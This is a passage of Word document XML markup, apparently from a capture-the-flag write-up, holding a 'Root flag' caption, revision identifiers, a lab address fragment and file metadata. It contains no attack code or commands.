          <w:noProof/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - Root flag</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:sectPr w:rsidR="004B6CE4" w:rsidRPr="00CB30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00B03"/>
    <w:rsid w:val="0010351D"/>
    <w:rsid w:val="001409A8"/>
    <w:rsid w:val="00253185"/>
    <w:rsid w:val="003E7890"/>
    <w:rsid w:val="004917A9"/>
    <w:rsid w:val="004B23E9"/>
    <w:rsid w:val="004B6CE4"/>
    <w:rsid w:val="004E245C"/>
    <w:rsid w:val="00507AF9"/>
    <w:rsid w:val="005702DD"/>
    <w:rsid w:val="005D07C6"/>
    <w:rsid w:val="006D481D"/>
    <w:rsid w:val="006F4E0C"/>
    <w:rsid w:val="008224F8"/>
    <w:rsid w:val="008F0C16"/>
    <w:rsid w:val="00915D60"/>
    <w:rsid w:val="009A4998"/>
    <w:rsid w:val="00A84B06"/>
    <w:rsid w:val="00AC7714"/>
    <w:rsid w:val="00AE7EC9"/>
    <w:rsid w:val="00BC3B9E"/>
    <w:rsid w:val="00C62298"/>
    <w:rsid w:val="00CB3015"/>
    <w:rsid w:val="00CD62ED"/>
    <w:rsid w:val="00CE707F"/>
    <w:rsid w:val="00D265A3"/>
    <w:rsid w:val="00DF72E4"/>
    <w:rsid w:val="00E11AAF"/>
    <w:rsid w:val="00EF34C6"/>
    <w:rsid w:val="00FC5FFC"/>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0.10.10.11:850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610</Words>
  <Characters>3478</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2024-06-16T10:13:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-06-16T09:18:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-06-16T10:13:00Z</dcterms:modified>
</cp:coreProperties>
</file>